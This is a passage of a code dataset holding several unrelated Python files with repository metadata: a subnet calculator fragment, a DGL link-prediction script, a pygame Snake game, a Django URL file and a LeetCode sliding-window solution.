'D'\n\telif data[0] >= 240 and data[0] <= 255: #E\n\t\treturn 'E'\n\telse:\n\t\treturn \"DN\"\n\ndef getNetworkID(data):\n\tclassName = getClass(data)\n\tif className in ['D', 'E']:\n\t\treturn \"Don't have Network Division\"\n\telif className == 'DN':\n\t\treturn \"Dont Know\"\n\treturn doAnding(data, getClassSubNet(className))\n\ndef getHostID(data):\n\tclassName = getClass(data)\n\tif className in ['D', 'E']:\n\t\treturn \"Don't have Network Division\"\n\telif className == 'DN':\n\t\treturn \"Dont Know\"\n\treturn doAnding(data, getClassSubNetForHost(className))\n\ndef getStringOutOf(data):\n\tst = \"\"\n\tfor ele in data:\n\t\tst += str(ele)\n\t\tst += '.'\n\treturn st[:-1]\n\ndef getBroadCastAddress(chunks):\n\tchunks = getNetworkID(chunks)\n\tfor i in range(len(chunks)):\n\t\tif chunks[i] == 0:\n\t\t\tchunks[i] = 255\n\treturn chunks\n\ndef getMaskFromSlashNotation(data):\n\tchunks = []\n\twhile data > 8:\n\t\tchunks.append(int('1' * 8, 2))\n\t\tdata -= 8\n\tif data != 0:\n\t\ta = '1' * data\n\t\tif len(a) != 8:\n\t\t\ta += \"0\" * (8 - len(a))\n\t\tchunks.append(int(a, 2))\n\n\twhile len(chunks) != 4:\n\t\tchunks.append(0)\n\treturn chunks\n\n#For Class C: each bit borrowed beyond /24 doubles the subnet count\ndef getMaxSubnet(data):\n\treturn pow(2, data - 24)\n\n#For Class C\ndef getMaxHost(data):\n\treturn pow(2, 32 - data) - 2\n\npart = input(\"Select The Part : \")\nif part == 'A':\n\tprint(\"Part - A\")\n\tdata = str(input(\"Enter the slash Notation Value : \"))\n\tdata = int(data.split('/')[1])\n\tmask = getMaskFromSlashNotation(data)\n\tprint(\"Sub Net Mask : \", getStringOutOf(mask))\n\tprint(\"Max SubNets : \", getMaxSubnet(data))\n\tprint(\"Max Hosts : \", getMaxHost(data))\nelif part == 'B':\n\tprint(\"Part - B\")\n\tdata = str(input(\"Enter the Ip Address : \"))\n\tchunks = [int(d) for d in data.split('.')]\n\tif len(chunks) != 4:\n\t\tprint(\"Invalid IP ..!!\")\n\telse:\n\t\tprint(\"Network Id Is : \", getStringOutOf(getNetworkID(chunks)))\n\t\tprint(\"BroadCast Address Is : \", getStringOutOf(getBroadCastAddress(chunks)))\n\t\tprint(\"Host Id Is : \", getStringOutOf(getHostID(chunks)))\n\t\tprint(\"Host Range Is Starting From : \", getStringOutOf(chunks), \" Upto : \" , getStringOutOf(getBroadCastAddress(chunks)), \" Exclude First And Last Address.\")\nelse:\n\tprint(\"Invalid Choice ..!!\")\n\n","repo_name":"sanskarjamadar/CN_Problems","sub_path":"Problem 2/problem 
2.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24072023481","text":"'''Learning-based method for link prediction'''\n\n__author__ = 'Wenjin Deng'\n\nimport pandas as pd\nimport os\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport networkx as nx\nimport random\n\n''' global args '''\nA_path = './A_similarity.csv'\nB_path = './B_similarity.csv'\nA_B_path = './A_B_adjacent.csv'\nembed_dim = 256\nmid_dim = 1024\nout_dim = 512\nhidden_edges = 4 # 4,8,16,32,64\nmax_epoch = 200\nneg_node_num = 16 # neg node sample num\nrebuild_graph = False\navg_cnt = 3\ndevice=torch.device(\"cpu\")\n\n# if torch.cuda.is_available():\n# device=torch.device(\"cuda\")\n\ndef get_heterograph_items(data_path, mode, threshold=0.75):\n \"\"\"\n This function is used to get edge pairs.\n\n Parameters:\n data_path - Str. graph csv file path\n mode - Str. Valid values are 'self' and 'correlation'. \n Use 'self' for normalizing and discretizing edge score, further picking edge where score is 1\n Use 'correlation' for directly picking edge where score is 1\n threshold - Float. edge score = 0 if input < threshold, else 1\n\n Returns:\n src - List. Left nodes of Edges\n dst - List. Right nodes of Edges\n rows_name_list - List. csv rows name\n cols_name_list - List. csv cols name\n\n Note:\n src contains duplicate elements, and must be subset of rows_name_list. \n It's also true for pair (dst, cols_name_list).\n \"\"\"\n assert mode in ['self', 'correlation']\n # 1. read csv\n matrix = pd.read_csv(data_path)\n # 2. get rows name and cols name\n rows_name_list = matrix[matrix.columns.tolist()[0]].tolist()\n cols_name_list = matrix.columns.tolist()[1:]\n \n src = []\n dst = []\n\n # 3. store node pair of edges to src and dst\n if mode == 'self':\n min_value = min([matrix[name].min() for name in cols_name_list])\n max_value = max([matrix[name].max() for name in cols_name_list])\n for idx, row in matrix.iterrows():\n # print(idx)\n # print(row)\n for name in cols_name_list:\n # 1. normalization (set value to 0-1)\n # 2. discretization (round)\n # item_val = round(float(row[name])/(max_value-min_value))\n item_val = 0 if float(row[name])/(max_value-min_value) < threshold else 1\n # 3. record\n if item_val == 1:\n src.append(rows_name_list[idx])\n dst.append(name)\n else:\n for idx, row in matrix.iterrows():\n for name in cols_name_list:\n # 3. 
record\n if int(row[name]) == 1:\n src.append(rows_name_list[idx])\n dst.append(name)\n \n return src, dst, rows_name_list, cols_name_list\n\n# Define a Heterograph Conv model\nclass RGCN(nn.Module):\n \"\"\"\n copy from dgl official docs\n \"\"\"\n def __init__(self, in_feats, hid_feats, out_feats, rel_names):\n super().__init__()\n # Instantiate HeteroGraphConv: in_feats is the input feature dimension, out_feats is the output feature dimension, aggregate is the type of aggregation function\n self.conv1 = dglnn.HeteroGraphConv({\n rel: dglnn.GraphConv(in_feats, hid_feats)\n for rel in rel_names}, aggregate='sum')\n self.conv2 = dglnn.HeteroGraphConv({\n rel: dglnn.GraphConv(hid_feats, out_feats)\n for rel in rel_names}, aggregate='sum')\n\n def forward(self, graph, inputs):\n # The input is a dict of node features\n h = self.conv1(graph, inputs)\n h = {k: F.relu(v) for k, v in h.items()}\n h = self.conv2(graph, h)\n return h\n \n# Define a Heterograph DotProduct Predictor\nclass HeteroDotProductPredictor(nn.Module):\n \"\"\"\n copy from dgl official docs\n \"\"\"\n def forward(self, graph, h, etype):\n # h holds the node representations computed for every edge type of the heterograph (see section 5.1 of the DGL user guide)\n with graph.local_scope():\n graph.ndata['h'] = h\n graph.apply_edges(fn.u_dot_v('h', 'h', 'score'), etype=etype)\n return graph.edges[etype].data['score']\n\n# Define a method to construct negative graph \ndef construct_negative_graph(graph, k, etype):\n \"\"\"\n copy from dgl official docs\n \"\"\"\n utype, _, vtype = etype\n src, dst = graph.edges(etype=etype)\n neg_src = src.repeat_interleave(k)\n neg_dst = torch.randint(0, graph.num_nodes(vtype), (len(src) * k,))\n return dgl.heterograph(\n {etype: (neg_src, neg_dst)},\n num_nodes_dict={ntype: graph.num_nodes(ntype) for ntype in graph.ntypes})\n\n# Define a method to normalize node embedding vector\ndef norm_node_embedding(node_h):\n \"\"\"\n normalize node vector\n \"\"\"\n node_h['A'] = F.normalize(node_h['A'], p=2, dim=1)\n node_h['B'] = F.normalize(node_h['B'], p=2, dim=1)\n return node_h\n\n# Define a model\nclass Model(nn.Module):\n \"\"\"\n adapted from dgl official docs\n \"\"\"\n def __init__(self, in_features, hidden_features, out_features, rel_names):\n super().__init__()\n self.sage = RGCN(in_features, hidden_features, out_features, rel_names)\n self.pred = HeteroDotProductPredictor()\n def forward(self, g, neg_g, x, etype):\n h = self.sage(g, x)\n h = norm_node_embedding(h) # without this normalization, edge scores fall outside the range [-1, 1]\n return self.pred(g, h, etype), self.pred(neg_g, h, etype)\n\n# Define a loss\ndef compute_loss(pos_score, neg_score):\n \"\"\"\n copy from dgl official docs\n \"\"\"\n # margin (hinge) loss\n n_edges = pos_score.shape[0]\n return (1 - pos_score.unsqueeze(1) + neg_score.view(n_edges, -1)).clamp(min=0).mean()\n\n# train \ndef train(hetero_graph, max_epoch, embed_dim, mid_dim, out_dim, hidden_edges):\n # 1. 
prepare nodes embedding\n A_embed = nn.Embedding(hetero_graph.number_of_nodes('A'), embed_dim)\n B_embed = nn.Embedding(hetero_graph.number_of_nodes('B'), embed_dim)\n A_edge_embed = nn.Embedding(hetero_graph.number_of_edges('A_self'), embed_dim)\n B_edge_embed = nn.Embedding(hetero_graph.number_of_edges('B_self'), embed_dim)\n AB_edge_embed = nn.Embedding(hetero_graph.number_of_edges('A_and_B'), embed_dim)\n hetero_graph.nodes['A'].data['feat'] = A_embed.weight\n hetero_graph.nodes['B'].data['feat'] = B_embed.weight\n hetero_graph.edges['A_self'].data['feat'] = A_edge_embed.weight\n hetero_graph.edges['B_self'].data['feat'] = B_edge_embed.weight\n hetero_graph.edges['A_and_B'].data['feat'] = AB_edge_embed.weight\n hetero_graph.to(device)\n\n node_features = {'A': hetero_graph.nodes['A'].data['feat'], 'B': hetero_graph.nodes['B'].data['feat']}\n\n # 2. instancing a model\n model = Model(embed_dim, mid_dim, out_dim, hetero_graph.etypes).to(device)\n model.train()\n \n # 3. prepare an optimizer\n opt = torch.optim.Adam(model.parameters())\n\n # 4 training schedule\n for epoch in range(max_epoch):\n negative_graph = construct_negative_graph(hetero_graph, neg_node_num, ('A', 'A_and_B', 'B'))\n pos_score, neg_score = model(hetero_graph, negative_graph, node_features, ('A', 'A_and_B', 'B'))\n loss = compute_loss(pos_score, neg_score)\n opt.zero_grad()\n loss.backward()\n opt.step()\n print(f'training {epoch+1}//{max_epoch}\\tloss:{loss.item()}')\n # print(pos_score.shape[0]) # edges num\n return model\n\n# eval\ndef eval(model, hidden_graph):\n with torch.no_grad():\n model.eval()\n # 1. prepare nodes embedding\n src_embed = nn.Embedding(hidden_graph.number_of_nodes('A'), embed_dim)\n dst_embed = nn.Embedding(hidden_graph.number_of_nodes('B'), embed_dim)\n hidden_graph.nodes['A'].data['feat'] = src_embed.weight\n hidden_graph.nodes['B'].data['feat'] = dst_embed.weight\n hidden_graph.to(device)\n hidden_node = {'A':hidden_graph.nodes['A'].data['feat'], 'B':hidden_graph.nodes['B'].data['feat']}\n\n # 2. infer to obtain score list of hidden edges\n node_h = model.sage(hidden_graph, hidden_node)\n node_h = norm_node_embedding(node_h)\n score = model.pred(hidden_graph, node_h, ('A', 'A_and_B', 'B'))\n score = score.numpy()\n # print(score)\n print('src\\tdst\\tscore')\n valid_cnt = 0\n for idx, zip_item in enumerate(zip(AB_src_hid,AB_dst_hid)):\n src,dst = zip_item\n if score[idx][0]>0:\n valid_cnt += 1\n print(f'{src}\\t{dst}\\t{score[idx][0]}')\n print(f'Pr@k (k={len(AB_src_hid)}): {valid_cnt/len(AB_src_hid)}')\n return valid_cnt/len(AB_src_hid)\n\nif __name__== \"__main__\":\n avg_score = 0\n\n for _ in range(avg_cnt):\n # 1. prepare items for graph\n A_src, A_dst, A_rows_name_list, A_cols_name_list = get_heterograph_items(A_path, 'self')\n B_src, B_dst, B_rows_name_list, B_cols_name_list = get_heterograph_items(B_path, 'self')\n AB_src, AB_dst, AB_rows_name_list, AB_cols_name_list = get_heterograph_items(A_B_path, 'correlation')\n\n # 2. trans node name to dict for unique id\n A_full_dict={}\n B_full_dict={}\n for id,name in enumerate(AB_rows_name_list):\n A_full_dict.update({name: id})\n for id,name in enumerate(AB_cols_name_list):\n B_full_dict.update({name: id})\n\n\n # 3. 
randomly hide edge\n if rebuild_graph:\n print('rebuild graph task')\n AB_src_hid = AB_src\n AB_dst_hid = AB_dst\n else:\n print('link prediction task')\n print('random hid...')\n hid_pair = random.sample(range(len(AB_src)), hidden_edges)\n AB_src_hid = []\n AB_dst_hid = []\n AB_src_rest = []\n AB_dst_rest = []\n for idx,zip_item in enumerate(zip(AB_src,AB_dst)):\n src, dst = zip_item\n if idx in hid_pair:\n AB_src_hid.append(src)\n AB_dst_hid.append(dst)\n else:\n AB_src_rest.append(src)\n AB_dst_rest.append(dst)\n\n # 4. build rest heterograph (rest = origin - hidden)\n if rebuild_graph:\n hetero_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src],[B_full_dict[name] for name in AB_dst])\n }\n )\n else:\n hetero_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src_rest],[B_full_dict[name] for name in AB_dst_rest])\n }\n )\n\n print('training grapha\\n', hetero_graph)\n # print(hetero_graph.number_of_nodes())\n # print(hetero_graph.number_of_edges())\n\n # 5. train\n model = train(hetero_graph, max_epoch, embed_dim, mid_dim, out_dim, hidden_edges)\n \n # 6. build hidden graph with hidden edges\n if rebuild_graph:\n hidden_graph = hetero_graph\n else:\n hidden_graph = dgl.heterograph(\n {\n ('A', 'A_self', 'A') : ([A_full_dict['A_'+str(name)] for name in A_src], [A_full_dict['A_'+str(name)] for name in A_dst]),\n ('B', 'B_self', 'B') : ([B_full_dict['B_'+str(name)] for name in B_src], [B_full_dict['B_'+str(name)] for name in B_dst]),\n ('A', 'A_and_B', 'B') : ([A_full_dict[name] for name in AB_src_hid],[B_full_dict[name] for name in AB_dst_hid])\n }\n )\n print('eval grapha\\n', hidden_graph)\n\n # 7. 
eval\n final_score = eval(model, hidden_graph)\n\n avg_score += final_score\n \n print(f'avg_{avg_cnt}: {avg_score/avg_cnt}')\n","repo_name":"WinstonDeng/LinkPrediction","sub_path":"learning_based.py","file_name":"learning_based.py","file_ext":"py","file_size_in_byte":12392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74148683394","text":"import pygame\r\nimport random\r\nimport pandas as pd\r\n\r\n\r\n# classes\r\nclass Player:\r\n global screen_size_x\r\n global screen_size_y\r\n\r\n def __init__(self):\r\n self.width = 10\r\n self.height = 10\r\n self.x = 100\r\n self.y = 40\r\n self.move = 10\r\n self.direction = 5\r\n self.speed = 100\r\n\r\n def movement(self):\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_UP] \\\r\n and self.y >= self.height \\\r\n and self.direction != 1\\\r\n and self.direction != 6:\r\n self.direction = 0\r\n elif keys[pygame.K_DOWN] \\\r\n and self.y <= screen_size_y - 2 * self.height \\\r\n and self.direction != 0\\\r\n and self.direction != 6:\r\n self.direction = 1\r\n elif keys[pygame.K_LEFT] \\\r\n and self.x >= self.width \\\r\n and self.direction != 3\\\r\n and self.direction != 6:\r\n self.direction = 2\r\n elif keys[pygame.K_RIGHT] \\\r\n and self.x <= screen_size_x - 2 * self.width \\\r\n and self.direction != 2\\\r\n and self.direction != 6:\r\n self.direction = 3\r\n\r\n if self.direction == 0 \\\r\n and self.y >= self.height:\r\n self.y -= self.move\r\n elif self.direction == 1 \\\r\n and self.y <= screen_size_y - 2 * self.height:\r\n self.y += self.move\r\n elif self.direction == 2 \\\r\n and self.x >= self.width:\r\n self.x -= self.move\r\n elif self.direction == 3 \\\r\n and self.x <= screen_size_x - 2 * self.width:\r\n self.x += self.move\r\n\r\n def snake_head(self):\r\n pygame.draw.rect(screen, black,\r\n (self.x, self.y, snake.width, snake.height))\r\n\r\n\r\nclass Food:\r\n def __init__(self):\r\n self.x = random.randrange(1, 47) * 10\r\n self.y = random.randrange(1, 47) * 10\r\n self.width = 10\r\n self.height = 10\r\n\r\n def display_food(self):\r\n pygame.draw.rect(screen, red,\r\n (self.x, self.y, self.width, self.height))\r\n\r\n\r\nclass Tail:\r\n def __init__(self):\r\n self.x = 10\r\n self.y = 10\r\n\r\n def new_tail(self):\r\n for i in game.snake_lst:\r\n pygame.draw.rect(screen, snake_body_color,\r\n (i[0], i[1], self.x, self.y))\r\n\r\n\r\nclass Game:\r\n global screen_size_x\r\n global screen_size_y\r\n\r\n def __init__(self):\r\n self.score_count = 0\r\n self.snake_lst = []\r\n self.snake_len = 0\r\n self.running = True\r\n self.snake_head = []\r\n self.flag = 0\r\n\r\n def menu(self):\r\n while self.running:\r\n pygame.time.delay(100)\r\n screen.fill(white)\r\n menu_page()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n pygame.display.update()\r\n\r\n def exit_game(self):\r\n self.flag = 0\r\n self.running = False\r\n score_board()\r\n\r\n def restart(self):\r\n self.flag = 0\r\n self.running = True\r\n score_board()\r\n while self.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.running = False\r\n snake.speed = 100\r\n self.score_count = 0\r\n self.snake_lst = []\r\n self.snake_len = 0\r\n self.snake_head = []\r\n game.gameloop()\r\n pygame.display.update()\r\n\r\n def gameloop(self):\r\n snake.x = 140\r\n snake.y = 60\r\n snake.direction = 5\r\n while self.running:\r\n screen.fill(black)\r\n screen.blit(back_ground_game, (0, 0))\r\n 
pygame.time.delay(snake.speed)\r\n tail.new_tail()\r\n snake.snake_head()\r\n food.display_food()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n screen.fill(black)\r\n self.running = False\r\n\r\n pygame.time.get_ticks()\r\n self.snake_head = [snake.x, snake.y]\r\n self.snake_lst.append(self.snake_head)\r\n snake.movement()\r\n\r\n if snake.x == food.x \\\r\n and snake.y == food.y:\r\n food.x = random.randrange(1, 47) * 10\r\n food.y = random.randrange(1, 47) * 10\r\n snake.speed -= 1\r\n self.score_count += 1\r\n self.snake_len += 1\r\n if self.snake_len % 5 == 0:\r\n snake.speed -= 2\r\n value = main_font.render(\"Score: \" + str(self.score_count), True, grey)\r\n screen.blit(value, [10, 0])\r\n\r\n if len(self.snake_lst) > self.snake_len:\r\n del self.snake_lst[0]\r\n\r\n # game over for those terms:\r\n for i in self.snake_lst[1:]:\r\n if self.snake_lst[0] == i:\r\n game_over()\r\n snake.direction = 6\r\n\r\n if snake.x == 0 \\\r\n or snake.y == 0 \\\r\n or snake.x == screen_size_x - 10 \\\r\n or snake.y == screen_size_y - 10:\r\n game_over()\r\n pygame.display.update()\r\n\r\n\r\ndef score_board_menu():\r\n score_board_df()\r\n global high_score\r\n while game.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.running = False\r\n pygame.mouse.set_visible(True)\r\n screen.fill(white)\r\n screen.blit(score_board_back_ground, (0, 125))\r\n score_board_font = font_over.render(\"Score Board\", False, black)\r\n screen.blit(score_board_font, (71, 40))\r\n first_name = high_score.iloc[0][0]\r\n second_name = high_score.iloc[1][0]\r\n third_name = high_score.iloc[2][0]\r\n first_score = str(high_score.iloc[0][1])\r\n second_score = str(high_score.iloc[1][1])\r\n third_score = str(high_score.iloc[2][1])\r\n first = main_font.render(first_name, False, white)\r\n screen.blit(first, (215, 320))\r\n second = main_font.render(second_name, False, white)\r\n screen.blit(second, (65, 380))\r\n third = main_font.render(third_name, False, white)\r\n screen.blit(third, (370, 390))\r\n first = main_font.render(first_score, False, white)\r\n screen.blit(first, (230, 360))\r\n second = main_font.render(second_score, False, white)\r\n screen.blit(second, (85, 420))\r\n third = main_font.render(third_score, False, white)\r\n screen.blit(third, (390, 435))\r\n button(blue, light_blue, 15, 3, 20, 0, 75, 40, \"Back\", \"back_to_menu\")\r\n button(light_red, red, 420, 3, 425, 0, 75, 40, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef score_board_game_over():\r\n score_board_df()\r\n global high_score\r\n while game.running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game.running = False\r\n pygame.mouse.set_visible(True)\r\n screen.fill(white)\r\n screen.blit(score_board_back_ground, (0, 125))\r\n score_board_font = font_over.render(\"Score Board\", False, black)\r\n screen.blit(score_board_font, (71, 40))\r\n first_name = high_score.iloc[0][0]\r\n second_name = high_score.iloc[1][0]\r\n third_name = high_score.iloc[2][0]\r\n first_score = str(high_score.iloc[0][1])\r\n second_score = str(high_score.iloc[1][1])\r\n third_score = str(high_score.iloc[2][1])\r\n first = main_font.render(first_name, False, white)\r\n screen.blit(first, (215, 320))\r\n second = main_font.render(second_name, False, white)\r\n screen.blit(second, (65, 380))\r\n third = main_font.render(third_name, False, white)\r\n screen.blit(third, (370, 390))\r\n first = main_font.render(first_score, False, white)\r\n screen.blit(first, 
(230, 360))\r\n second = main_font.render(second_score, False, white)\r\n screen.blit(second, (90, 410))\r\n third = main_font.render(third_score, False, white)\r\n screen.blit(third, (390, 435))\r\n button(blue, light_blue, 15, 3, 20, 0, 115, 40, \"Restart\", \"restart\")\r\n button(light_red, red, 420, 3, 425, 0, 75, 40, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef game_over():\r\n if game.flag == 0:\r\n score_board()\r\n score_board_df()\r\n game.flag = 1\r\n screen.fill(white)\r\n pygame.mouse.set_visible(True)\r\n screen.blit(back_ground_end, (-40, -10))\r\n game_over_font = font_over.render(\"GameOver\", False, black)\r\n screen.blit(game_over_font, (180, 275))\r\n name = score_font.render(str(player_name) + \"'s\", False, black)\r\n screen.blit(name, (265, 0))\r\n score = score_font.render(\"Score: \" + str(game.score_count), False, black)\r\n screen.blit(score, (235, 45))\r\n author = small_font.render(\"Amit Sabban\", False, light_red)\r\n screen.blit(author, (30, 470))\r\n button(light_grey, grey, 247, 140, 255, 140, 190, 50, \"Score-Board\", \"score_board_game_over\")\r\n button(light_green, green, 280, 200, 285, 195, 115, 40, \"Restart\", \"restart\")\r\n button(light_red, red, 300, 250, 305, 245, 75, 35, \"Quit\", \"exit\")\r\n\r\n\r\ndef menu_page():\r\n score_board_df()\r\n pygame.mouse.set_visible(True)\r\n screen.blit(back_ground_menu, (0, 0))\r\n game_name = font_name.render(\"Snake\", False, black)\r\n screen.blit(game_name, (220, 10))\r\n author = small_font.render(\"Amit Sabban\", False, light_red)\r\n screen.blit(author, (30, 470))\r\n button(light_green, green, 272, 140, 278, 140, 145, 44, \"Play game\", \"name_box\")\r\n button(light_grey, grey, 250, 220, 255, 220, 190, 50, \"Score-Board\", \"score_board_menu\")\r\n button(light_red, red, 300, 300, 310, 300, 85, 50, \"Quit\", \"exit\")\r\n pygame.display.update()\r\n\r\n\r\ndef button(color1, color2, x, y, x_loc, y_loc, width, height, text='', action=None):\r\n mouse = pygame.mouse.get_pos()\r\n click = pygame.mouse.get_pressed()\r\n if x < mouse[0] < x + width and y < mouse[1] < y + height:\r\n pygame.draw.rect(screen, color2, (x, y, width, height))\r\n if click[0] == 1 and action is not None:\r\n if action == \"exit\":\r\n action = None\r\n game.exit_game()\r\n if action == \"name_box\":\r\n action = None\r\n name_box()\r\n if action == \"restart\":\r\n action = None\r\n game.restart()\r\n if action == \"back_to_menu\":\r\n action = None\r\n game.menu()\r\n if action == \"score_board_menu\":\r\n action = None\r\n score_board_menu()\r\n if action == \"score_board_game_over\":\r\n action = None\r\n score_board_game_over()\r\n else:\r\n pygame.draw.rect(screen, color1, (x, y, width, height))\r\n text = main_font.render(text, False, black)\r\n screen.blit(text, (x_loc, y_loc))\r\n\r\n\r\ndef name_box():\r\n global player_name\r\n name_screen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\n input_box = pygame.Rect(150, 90, 140, 40)\r\n color = black\r\n active = True\r\n text = ''\r\n done = False\r\n while not done:\r\n for event in pygame.event.get():\r\n pygame.mouse.set_visible(False)\r\n if event.type == pygame.QUIT:\r\n done = True\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n if input_box.collidepoint(event.pos):\r\n active = not active\r\n if event.type == pygame.KEYDOWN:\r\n if active:\r\n if event.key == pygame.K_RETURN:\r\n if text == \"\":\r\n player_name_2 = main_font.render(\"Please Enter Your Name:\", False, red)\r\n name_screen.blit(player_name_2, (80, 30))\r\n 
pygame.display.update()\r\n pygame.time.wait(500)\r\n else:\r\n player_name = text.capitalize()\r\n done = True\r\n game.gameloop()\r\n text = ''\r\n elif event.key == pygame.K_BACKSPACE:\r\n text = text[:-1]\r\n else:\r\n text += event.unicode\r\n\r\n name_screen.blit(rules_back_ground, (0, 0))\r\n text_surface = main_font.render(text, False, color)\r\n width = max(200, text_surface.get_width() + 10)\r\n input_box.w = width\r\n name_screen.blit(text_surface, (input_box.x + 5, input_box.y - 8))\r\n pygame.draw.rect(name_screen, color, input_box, 2)\r\n player_name = main_font.render(\"Please Enter Your Name:\", False, black)\r\n name_screen.blit(player_name, (80, 30))\r\n submit_name = name_font.render(\"Press Enter To Start Playing\", False, black)\r\n name_screen.blit(submit_name, (110, 160))\r\n rules = main_font.render(\"Rules:\", False, black)\r\n name_screen.blit(rules, (60, 210))\r\n pygame.display.update()\r\n\r\n\r\n# data frame:\r\ndef score_board():\r\n try:\r\n with open(\"Score_Board.csv\", 'a') as s_b_csv:\r\n s_b_csv.write(player_name + ',' + str(game.score_count) + '\\n')\r\n except:\r\n print(\"File not Found\")\r\n\r\ndef score_board_df():\r\n global high_score\r\n df = pd.read_csv(\"Score_Board.csv\", delimiter=',')\r\n score_board_sorted = df.sort_values(\"Score\", ascending=False).drop_duplicates()\r\n high_score = score_board_sorted.head(3)\r\n\r\n\r\n# init\r\npygame.init()\r\n\r\n# classes objects\r\ngame = Game()\r\nsnake = Player()\r\nfood = Food()\r\ntail = Tail()\r\n\r\n# variables\r\nplayer_name = \"\"\r\nhigh_score = []\r\n\r\n# screen\r\nscreen_size_x = 500\r\nscreen_size_y = 500\r\n\r\n# colors\r\nsnake_head_color = (93, 116, 4)\r\nsnake_body_color = (215, 138, 75)\r\nwhite = (255, 255, 255)\r\nlight_red = (255, 0, 0)\r\nred = (200, 0, 0)\r\nlight_green = (0, 255, 0)\r\ngreen = (150, 208, 47)\r\nblack = (0, 0, 0)\r\nlight_grey = (220, 220, 220)\r\ngrey = (200, 200, 200)\r\nlight_blue = (0, 0, 255)\r\nblue = (149, 202, 255)\r\n\r\n# fonts\r\nfont_name = pygame.font.SysFont(\"Comic Sans MS\", 85)\r\nfont_over = pygame.font.SysFont(\"Comic Sans MS\", 65)\r\nscore_font = pygame.font.SysFont(\"Comic Sans MS\", 50)\r\nmain_font = pygame.font.SysFont(\"Comic Sans MS\", 30)\r\nname_font = pygame.font.SysFont(\"Comic Sans MS\", 20)\r\nsmall_font = pygame.font.SysFont(\"Comic Sans MS\", 18)\r\n\r\n# game screen\r\nscreen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\npygame.display.set_caption(\"Snake\")\r\nover_screen = pygame.display.set_mode((screen_size_x, screen_size_y))\r\npygame.display.set_caption(\"Snake\")\r\n\r\n# pictures\r\nicon = pygame.image.load(\"pictures\\\\snake_icon.png\")\r\npygame.display.set_icon(icon)\r\nback_ground_menu = pygame.image.load(\"pictures\\\\snake_bg_menu.png\")\r\nback_ground_end = pygame.image.load(\"pictures\\\\snake_bg_end.png\")\r\nback_ground_game = pygame.image.load(\"pictures\\\\grass_bg.png\")\r\nrules_back_ground = pygame.image.load(\"pictures\\\\rules_bg.png\")\r\nscore_board_back_ground = pygame.image.load(\"pictures\\\\score_board_bg.png\")\r\n\r\n# play\r\ngame.menu()\r\n","repo_name":"amitsabban/First-Project_Snake-Game","sub_path":"snake_game/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":15295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12033046714","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 
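A note on the snake game's scoreboard above: score_board() appends bare "name,score" rows to Score_Board.csv, while score_board_df() sorts on a "Score" header, so the file must already begin with a header line or pd.read_csv will misread the first game's row. A header-safe writer sketch under the same one-row-per-game layout (the "Name" column label is a guess; only "Score" is visible in the source):

import os

def append_score(path, player_name, score):
    # Write the header exactly once, then append one 'name,score' row per game.
    is_new = not os.path.isfile(path)
    with open(path, 'a') as fh:
        if is_new:
            fh.write('Name,Score\n')
        fh.write(f'{player_name},{score}\n')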
'PuntoVenta.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^', include('Apps.Ventas.urls', namespace='Venta')),\n url(r'^', include('Apps.Producto.urls', namespace='Producto')),\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"Ezla/Venta","sub_path":"PuntoVenta/PuntoVenta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11216572600","text":"class Solution(object):\n def minSubArrayLen(self, s, nums):\n \"\"\"\n :type s: int\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # 7 star, 没能掌握,必须熟练掌握\n # 双指针,滑动窗口法\n # 双指针法,右指针不断往右遍历,如果左指针和右指针构成的子数组的和大于等于s了,左指针也开始往右遍历,意图寻找\n # 以右指针结尾且和大于等于s的子数组的最小长度,找到当前的最小长度左指针往前移动一步,右指针也继续往前直到和左指针构成的数组的和再次大于等于s,\n # 这时左指针又可以往前了,直到找到当前右指针为结尾的最小长度的子数组,一直这样重复,直到右指针到达数组的最右边\n if sum(nums) < s:\n return 0\n _min = 0xffffffff\n left, right = 0, 1\n cur = nums[0]\n while right < len(nums):\n while cur < s and right < len(nums):\n cur += nums[right]\n right += 1\n\n while cur >= s and left < right:\n cur -= nums[left]\n left += 1\n _min = min(_min, right - left + 1)\n return _min\n\n\nprint(Solution().minSubArrayLen(7, [2,3,1,2,4,3]))\n\n# 一开始自己做的,超时了\n# class 